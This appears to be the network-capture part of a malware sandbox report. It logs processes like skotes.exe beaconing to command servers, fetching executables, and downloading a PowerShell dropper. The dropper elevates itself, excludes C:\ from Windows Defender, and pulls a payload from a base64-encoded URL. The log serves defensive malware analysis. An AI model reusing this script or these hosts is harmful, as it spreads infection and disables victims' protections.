Dec 8, 2024 19:53:10.599097967 CET	1236	IN	Data Raw: 56 83 ec 08 8b 6c 24 1c 8b 59 10 89 d8 35 ff ff ff 7f 39 e8 0f 82 28 01 00 00 01 dd 8b 79 14 be ff ff ff 7f 89 7c 24 04 78 14 89 f8 d1 e8 89 c2 81 f2 ff ff ff 7f 39 fa 0f 83 bc 00 00 00 8d 46 24 50 89 cf e8 15 65 00 00 89 f9 83 c4 04 8d 78 23 83 Data Ascii: Vl$Y59(y\|$x9F$Pex#Giql$r`$1SVWJD$(Pt$(S6D$(MrF) $QVd4$&SQWl$(Ut$(SD>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49804	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:19.658354044 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013238001&unit=246122658369
Dec 8, 2024 19:53:21.079696894 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49805	31.41.244.11	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:21.248729944 CET	66	OUT	GET /files/6554834407/ntRoEwh.exe HTTP/1.1 Host: 31.41.244.11
Dec 8, 2024 19:53:22.598140001 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:22 GMT Content-Type: application/octet-stream Content-Length: 2343424 Last-Modified: Sun, 08 Dec 2024 17:50:38 GMT Connection: keep-alive ETag: "6755dc6e-23c200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 44 d8 fe 65 00 b9 90 36 00 b9 90 36 00 b9 90 36 14 d2 95 37 01 b9 90 36 14 d2 93 37 02 b9 90 36 14 d2 94 37 12 b9 90 36 14 d2 91 37 11 b9 90 36 00 b9 91 36 a0 b9 90 36 14 d2 98 37 0a b9 90 36 14 d2 6f 36 01 b9 90 36 14 d2 92 37 01 b9 90 36 52 69 63 68 00 b9 90 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f8 c4 1b ae 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 14 00 7c 00 00 00 42 23 00 00 00 00 00 00 82 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 20 24 00 00 04 00 00 ed 0d 24 00 02 00 60 c1 00 00 08 00 00 00 00 00 00 20 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$De666767676766676o6676Rich6PEd"\|B#@ $$` <#$ T( .text{\| `.rdata"$@@.data@.pdata@@.rsrc ##@@.reloc $#@B
Dec 8, 2024 19:53:22.598167896 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc cc cc cc cc cc cc cc 45 33 c9 48 8d 42 ff 41 ba fe ff ff 7f 41 bb 57 00 Data Ascii: E3HBAAWI;EGExGHt"L+L+IHtAtHHuHHAHEHEAAzHtAE3LMHAWIBH=EGE
Dec 8, 2024 19:53:22.598180056 CET	1236	IN	Data Raw: 78 35 49 8b ca 48 8b c2 4d 85 d2 74 0e 80 38 00 74 09 48 ff c0 48 83 e9 01 75 f2 48 8b c1 48 f7 d8 45 1b c9 41 f7 d1 45 23 c8 48 85 c9 74 08 4d 8b c2 4c 2b c1 eb 03 45 33 c0 45 85 c9 78 58 49 8b ca 49 8d 14 10 49 2b c8 74 2e 48 8b c1 4d 8d 88 fe Data Ascii: x5IHMt8tHHuHHEAE#HtML+E3ExXIII+t.HMI+LL+MtAtIHHuHHBHEHEAAzALD$LL$ SVWH 3HBH=HWGx;HZHHLL$X3HDxH
Dec 8, 2024 19:53:22.598198891 CET	1236	IN	Data Raw: b9 00 02 00 00 c6 44 24 20 00 8b d7 48 ff 15 a2 7f 00 00 0f 1f 44 00 00 4c 8d 44 24 20 ba 3f 08 00 00 48 8b cb 48 ff 15 b1 7f 00 00 0f 1f 44 00 00 83 c9 ff 48 ff 15 92 7f 00 00 0f 1f 44 00 00 b8 01 00 00 00 48 8b 8c 24 20 02 00 00 48 33 cc e8 a0 Data Ascii: D$ HDLD$ ?HHDHDH$ H3nH$HH0_H\$Hl$Ht$WH HHH3@8+tjHHfHuHHfHuH?tHHfHtHcH8tHH\$0Hl$8H
Dec 8, 2024 19:53:22.598212004 CET	1236	IN	Data Raw: 48 ff 15 a2 77 00 00 0f 1f 44 00 00 83 f8 02 75 6b 48 8d 35 d1 a6 00 00 48 8b c3 48 ff c0 44 38 2c 06 75 f7 48 8d 4c 24 40 48 ff c3 44 38 2c 19 75 f7 48 8d 3c 18 b9 40 00 00 00 48 8d 57 08 48 ff 15 33 79 00 00 0f 1f 44 00 00 48 8b d8 48 85 c0 75 Data Ascii: HwDukH5HHD8,uHL$@HD8,uH<@HWH3yDHHuE3E3NLL$@LHWH@HxDHHtHL$@HwDt}uyLD$@H`L+H`HHtBtHHuHHA
Dec 8, 2024 19:53:22.598272085 CET	672	IN	Data Raw: 15 a0 74 00 00 0f 1f 44 00 00 48 8b f8 48 85 c0 75 59 21 44 24 28 45 33 c9 45 33 c0 c7 44 24 20 10 00 00 00 ba b5 04 00 00 33 c9 e8 79 2e 00 00 eb 23 48 8b 0d 14 bf 00 00 48 8d 54 24 60 44 8b c6 48 ff 15 85 74 00 00 0f 1f 44 00 00 85 c0 0f 85 70 Data Ascii: tDHHuY!D$(E3E3D$ 3y.#HHT$`DHtDpHL$PHrDALl$ LzLL$`EHHHLEH<uHL$PHA\$(E3H\|$ HdqDHL$PHqDHH\r
Dec 8, 2024 19:53:22.598283052 CET	1236	IN	Data Raw: 00 0f 1f 44 00 00 48 8d 4d 60 48 ff 15 4c 70 00 00 0f 1f 44 00 00 48 8d 54 24 20 48 8b ce 48 ff 15 f0 71 00 00 0f 1f 44 00 00 85 c0 0f 85 09 ff ff ff 48 8b ce 48 ff 15 81 72 00 00 0f 1f 44 00 00 48 8b cf 48 ff 15 6a 70 00 00 0f 1f 44 00 00 48 8b Data Ascii: DHM`HLpDHT$ HHqDHHrDHHjpDHpH3NbL$I[(Is0IA__]H\$WH@HH3H$0HL$ 3HoDtjLPuHL$ YLL$ E333HoDS@HL$ H
Dec 8, 2024 19:53:22.598376036 CET	1236	IN	Data Raw: 84 41 01 00 00 41 80 fe 57 0f 84 21 01 00 00 4c 8d 05 3b 71 00 00 c7 44 24 34 04 01 00 00 48 8d 44 24 40 ba 04 01 00 00 4c 2b c0 48 8d 4c 24 40 48 8d 82 fa fe ff 7f 48 85 c0 74 12 41 8a 04 08 84 c0 74 0a 88 01 49 03 cf 49 2b d7 75 e2 48 85 d2 48 Data Ascii: AAW!L;qD$4HD$@L+HL$@HHtAtII+uHHALHEHL$@@8THD$8AE3HD$ HT$@HHjDHL$8HD$4HD$(LL$0E3H\$ HoHjDuID$0u9AHT$@HH7l
Dec 8, 2024 19:53:22.598392010 CET	448	IN	Data Raw: 00 00 77 0f 48 8b d6 48 2b d3 48 81 c2 00 04 00 00 eb 02 33 d2 4c 8d 44 24 20 48 8b cb e8 7b e4 ff ff 49 8b c7 48 ff c0 80 3c 03 00 75 f7 eb 51 48 0f be 0f 48 ff 15 ba 69 00 00 0f 1f 44 00 00 3c 45 75 42 48 3b de 72 1d 48 8b c3 48 2b c6 48 3d 00 Data Ascii: wHH+H3LD$ H{IH<uQHHiD<EuBH;rHH+H=wHH+H3LD$ H(IH<uH?#uHH(iDHHHiDHH$0H39XH$xH@A__^H\$Ht$
Dec 8, 2024 19:53:22.598402023 CET	1236	IN	Data Raw: 74 52 40 f6 c7 04 75 2b c7 44 24 28 04 00 00 00 4c 8d 05 be 69 00 00 45 33 c9 c7 44 24 20 40 00 00 00 ba 22 05 00 00 33 c9 e8 73 20 00 00 83 f8 06 75 21 66 39 35 13 b1 00 00 75 13 33 d2 8d 4a 02 48 ff 15 dd 67 00 00 0f 1f 44 00 00 eb 05 e8 8d ee Data Ascii: tR@u+D$(LiE3D$ @"3s u!f95u3JHgDHHtHdDH\$@Ht$HH0_H\$VWAVHPH=H3H$@HHH3HtA3]3HA,\3HA
Dec 8, 2024 19:53:22.717762947 CET	1236	IN	Data Raw: 15 4c 60 00 00 0f 1f 44 00 00 85 c0 75 4d ba f0 04 00 00 45 33 c9 89 7c 24 28 45 33 c0 c7 44 24 20 10 00 00 00 33 c9 e8 a1 1b 00 00 e8 d0 44 00 00 89 05 0e a3 00 00 33 c0 48 8b 8c 24 50 02 00 00 48 33 cc e8 28 52 00 00 48 8b 9c 24 70 02 00 00 48 Data Ascii: L`DuME3\|$(E3D$ 3D3H$PH3(RH$pH`_H$@D5:tHH`Du9=uH(H@ HuXu9u0L8H\|$(H\|$ HE3H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49826	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:28.914083004 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013239001&unit=246122658369
Dec 8, 2024 19:53:30.272250891 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49828	31.41.244.11	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:30.393826008 CET	66	OUT	GET /files/5131681669/KeaEfrP.ps1 HTTP/1.1 Host: 31.41.244.11
Dec 8, 2024 19:53:31.887969971 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:31 GMT Content-Type: application/octet-stream Content-Length: 2687 Last-Modified: Sun, 08 Dec 2024 18:34:47 GMT Connection: keep-alive ETag: "6755e6c7-a7f" Accept-Ranges: bytes Data Raw: ef bb bf 23 20 e6 a3 80 e6 9f a5 e6 98 af e5 90 a6 e4 bb a5 e7 ae a1 e7 90 86 e5 91 98 e6 9d 83 e9 99 90 e8 bf 90 e8 a1 8c 0d 0a 69 66 20 28 2d 6e 6f 74 20 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 50 72 69 6e 63 69 70 61 6c 5d 20 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 49 64 65 6e 74 69 74 79 5d 3a 3a 47 65 74 43 75 72 72 65 6e 74 28 29 29 2e 49 73 49 6e 52 6f 6c 65 28 5b 53 65 63 75 72 69 74 79 2e 50 72 69 6e 63 69 70 61 6c 2e 57 69 6e 64 6f 77 73 42 75 69 6c 74 49 6e 52 6f 6c 65 5d 20 22 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 22 29 29 20 7b 0d 0a 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 70 6f 77 65 72 73 68 65 6c 6c 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 4e 6f 50 72 6f 66 69 6c 65 20 2d 45 78 65 63 75 74 69 6f 6e 50 6f 6c 69 63 79 20 42 79 70 61 73 73 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 46 69 6c 65 20 60 22 24 50 [TRUNCATED] Data Ascii: # if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File `"$PSCommandPath`"" -Verb RunAs exit}# Windows Defender Try { Add-MpPreference -ExclusionPath 'C:\' -ErrorAction SilentlyContinue} Catch { # }# URL$encoded_url = "aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4="$output = "$env:TEMP\downloaded_file.bin"# URLTry { Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded_url))) -OutFile $output -UseBasicParsing -ErrorAction SilentlyContinue} Catch { #
Dec 8, 2024 19:53:31.887994051 CET	1236	IN	Data Raw: 95 a5 e9 94 99 e8 af af 0d 0a 7d 0d 0a 0d 0a 23 20 e8 ae be e7 bd ae e5 af 86 e9 92 a5 e5 92 8c 20 49 56 0d 0a 24 6b 65 79 20 3d 20 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 55 54 46 38 2e 47 65 74 42 79 74 65 73 28 Data Ascii: }# IV$key = [System.Text.Encoding]::UTF8.GetBytes("blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9")$iv = [System.Text.Encoding]::UTF8.GetBytes("5t9nsUPo0cA/tUjH")# $retries
Dec 8, 2024 19:53:31.888005018 CET	448	IN	Data Raw: 20 20 20 20 20 20 20 20 20 23 20 e9 9d 99 e9 bb 98 e5 bf bd e7 95 a5 e9 94 99 e8 af af 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 72 65 61 6b 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a 23 20 e8 ae be e7 bd ae e5 bc 80 Data Ascii: # } break }}# $exePath = "C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe"# $startupFolder = "$env:APPDATA\Microsoft\Windows\S
Dec 8, 2024 19:53:32.079714060 CET	30	IN	Data Raw: 0d 0a 23 20 e9 9d 99 e9 bb 98 e9 80 80 e5 87 ba e8 84 9a e6 9c ac 0d 0a 65 78 69 74 0d 0a Data Ascii: # exit

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49838	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:33.806186914 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 34 38 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013248041&unit=246122658369
Dec 8, 2024 19:53:35.134763002 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49839	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:34.572345972 CET	410	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:35.049992085 CET	344	OUT	Data Raw: 00 07 01 02 06 08 04 05 05 06 02 01 02 0d 01 06 00 07 05 09 02 0d 03 08 00 0e 0d 07 06 53 01 09 0d 54 06 0e 07 01 06 51 0e 03 04 06 04 06 05 51 03 05 0e 0c 0e 07 04 51 05 02 05 05 04 04 06 58 00 01 0d 00 05 05 05 04 0e 54 0c 05 0f 0c 0e 03 06 03 Data Ascii: STQQQXT]WPU\L~C~cu[`LuLu[lkRf^`UtZlIxl`ZxNP~\|CtYxAj_~V@{mfNbq
Dec 8, 2024 19:53:35.869235992 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:36.045756102 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 35 30 0d 0a 56 4a 7e 4c 78 7d 7c 5a 7b 72 59 5b 7c 61 56 5a 7d 74 73 42 7f 60 57 4f 79 5d 6f 5d 7f 62 78 02 63 63 61 08 6d 62 62 5f 61 58 64 48 7d 5b 78 01 55 4b 71 08 74 62 73 03 6b 5c 5c 59 7f 67 5b 55 7b 76 51 52 69 60 60 58 62 71 7d 41 63 5f 75 47 7e 71 79 5d 7e 7c 78 08 7d 59 64 5e 75 5c 7b 06 7c 5b 6d 4a 7e 5e 5c 5b 6c 74 7c 43 6f 49 60 04 79 7e 77 01 6d 5b 7f 5a 7a 73 62 41 7c 60 7c 4a 7b 59 78 44 7e 5b 63 07 61 4f 56 4a 7a 51 41 5b 68 77 63 53 6b 58 6e 51 77 6c 5d 5d 7b 6f 74 04 60 60 76 4e 7b 71 7d 00 6a 6c 69 5a 6c 61 7a 02 61 05 6c 58 77 62 63 5a 77 61 50 50 7e 5d 79 5f 77 4c 6d 01 61 66 6c 09 68 0a 76 5c 77 6c 52 04 7f 4d 6c 00 6f 6c 5e 5a 6c 5e 65 5b 7c 6d 5e 08 77 67 6f 5c 7e 62 6d 50 69 6d 5a 51 78 43 5c 4c 6a 72 79 07 7b 5d 46 51 7f 42 7c 43 7e 06 78 40 7e 5e 62 00 78 53 51 44 78 71 74 49 68 4f 60 5b 7c 77 77 0a 7c 73 76 51 7b 60 74 4f 7d 5b 78 01 60 05 79 51 7b 5c 79 03 76 48 5a 01 7d 48 68 07 7d 48 53 0c 77 4c 7b 44 7c 4c 75 04 7f 59 50 41 78 58 70 0c 7d 4d 59 48 75 72 53 05 77 [TRUNCATED] Data Ascii: 550VJ~Lx}\|Z{rY[\|aVZ}tsB`WOy]o]bxccambb_aXdH}[xUKqtbsk\\Yg[U{vQRi``Xbq}Ac_uG~qy]~\|x}Yd^u\{\|[mJ~^\[lt\|CoI`y~wm[ZzsbA\|`\|J{YxD~[caOVJzQA[hwcSkXnQwl]]{ot``vN{q}jliZlazalXwbcZwaPP~]y_wLmaflhv\wlRMlol^Zl^e[\|m^wgo\~bmPimZQxC\Ljry{]FQB\|C~x@~^bxSQDxqtIhO`[\|ww\|svQ{`tO}[x`yQ{\yvHZ}Hh}HSwL{D\|LuYPAxXp}MYHurSwaq~aTK~l`}YQDvqcxL_\|paxglxw\|B{CIyrlFxsvA\|`RxI^~rwNwaR\|lsYdA_}vl^Ozlhw^\Cz_q~Rr{aru]]IwqdOtO\@^TtryMv[Z\|}tl^]`J{\|{E{^X\|}hAtg\|O}b~}m{B{}~bu@}`d\|B\|N~^x\|grxmkyrhK\|OwJ~Ig@\|NuOzMZObltsayqSDvHh}Hp~HmBvbc\|\W\|Ivyvh~McHv\utaq~qXHlxgQuOH{bm~NiygZCxIl{C{Iy\pxsvO{]NZ{wd\|asNbr\|I\|\|UhwVOhXbSvl`lBdv`nCzOX]}~_z\y\}b`g{ZL~JxY}]va}Ov[^hlf]t\|Q]\|ctIx\|p[{`vhm]ScwtjqyUzSYQ`q}@Tqf]Vs{PQo{S]MjJ~G\|SYIo\Z\|aUD}IlQh`yO{cZj\V`aAzXjYuH_~X`yXHp[V_PrFVdWIT^Aiotbnvp_WY~v~QA}YFu_{\|_OYinEUtAlU@n\|AS~^Xz^}yhlZTadJRODqXQ\QtAVdUHPY@bo]FWXv]}vnmWWdoOTLzBqZR_ZwE]bSISXNca\EZ\|SbYpRV\e[RZz{\|\ocDPqoWXdPS[aVRnMaTq [TRUNCATED]
Dec 8, 2024 19:53:36.045773983 CET	322	IN	Data Raw: 63 05 08 57 59 55 71 52 04 67 5d 70 5d 5f 51 62 63 7d 5a 74 71 7b 5c 69 65 08 40 52 7a 6e 56 58 61 07 55 6b 04 09 04 50 5d 61 40 53 67 0c 50 51 60 67 59 77 5f 72 60 5b 58 54 00 6b 62 62 56 65 0b 67 51 54 74 64 49 71 5c 45 59 6f 04 6e 46 50 73 40 Data Ascii: cWYUqRg]p]_Qbc}Ztq{\ie@RznVXaUkP]a@SgPQ`gYw_r`[XTkbbVegQTtdIq\EYonFPs@lUAnwCTW`AU[cDQry@hslZyZ\|beDqXQ\QtAVdUHPYSZTo][Zevmb\zR\_aXH\pQTibZZX[ShgzDp[\YZ{KUoTE[TFhokCRp`Yogz{ShNuYZN}\zQz\|VonAR~fYSc^PLj]WdeX\|S]Z
Dec 8, 2024 19:53:36.082256079 CET	386	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 384 Expect: 100-continue
Dec 8, 2024 19:53:36.442543983 CET	384	OUT	Data Raw: 54 5d 43 52 5f 57 55 5e 5c 5e 5b 53 52 5d 50 5e 56 5a 54 58 50 59 54 49 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T]CR_WU^\^[SR]P^VZTXPYTISVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&Z<.$_+X6#)?0]4:<&?80(\,<+(!3]%,'F.#]-"
Dec 8, 2024 19:53:36.512634993 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:36.875715971 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 5b 36 02 2b 56 35 04 03 51 3b 28 3a 5d 28 07 36 19 2d 2b 32 06 3f 30 37 15 2a 2c 2c 59 3c 58 2b 05 24 1d 04 51 35 32 23 50 25 34 20 5b 0d 1e 24 0a 20 23 2c 0f 3f 23 21 1c 3b 0e 26 59 26 01 35 02 35 04 0a 0b 33 05 13 1b 3f 32 07 1b 3f 0d 37 0e 30 00 20 5a 24 03 09 59 3c 3b 21 57 0c 11 21 50 25 09 24 50 35 0c 30 5b 27 32 16 0f 35 1c 2e 51 29 20 2e 58 24 01 2b 14 39 2b 39 5c 22 21 34 1c 3a 16 22 5a 36 2e 20 0d 3e 29 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989[6+V5Q;(:](6-+2?07*,,Y<X+$Q52#P%4 [$ #,?#!;&Y&553?2?70 Z$Y<;!W!P%$P50['25.Q) .X$+9+9\"!4:"Z6. >).R#.R?[O0
Dec 8, 2024 19:53:36.939455032 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1780 Expect: 100-continue
Dec 8, 2024 19:53:37.293792963 CET	1780	OUT	Data Raw: 54 59 46 5a 5f 5d 50 55 5c 5e 5b 53 52 54 50 58 56 5b 54 59 50 5b 54 43 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TYFZ_]PU\^[SRTPXV[TYP[TCSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%<5$:8"%^??(Z7$&+$B#<+]-<(1'F.#]-
Dec 8, 2024 19:53:37.469846964 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:37.889255047 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 12 22 15 27 56 36 04 2e 09 38 16 36 5b 2b 10 2a 5e 2c 38 3d 1b 2b 30 27 1b 28 05 20 10 2b 07 30 59 24 0a 2a 1a 22 1c 27 12 26 24 20 5b 0d 1e 27 1a 22 30 3b 1f 3c 0d 25 59 38 09 3a 13 26 3c 35 02 22 14 06 0c 24 05 17 5c 2b 31 21 57 29 33 02 14 24 29 24 1c 24 2d 3f 58 3e 2b 21 57 0c 11 22 08 32 20 3f 09 21 0c 12 5a 26 31 3f 1e 21 0b 26 18 3d 23 0c 59 24 01 0d 5a 2d 16 31 5c 36 21 2c 54 3a 38 08 5f 21 3d 0d 53 3d 39 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989"'V6.86[+^,8=+0'( +0Y$"'&$ ['"0;<%Y8:&<5"$\+1!W)3$)$$-?X>+!W"2 ?!Z&1?!&=#Y$Z-1\6!,T:8_!=S=9.R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49842	185.215.113.16	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:35.277686119 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 8, 2024 19:53:36.606226921 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:36 GMT Content-Type: application/octet-stream Content-Length: 1856512 Last-Modified: Sun, 08 Dec 2024 18:43:30 GMT Connection: keep-alive ETag: "6755e8d2-1c5400" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 ea b9 55 67 00 00 00 00 00 00 00 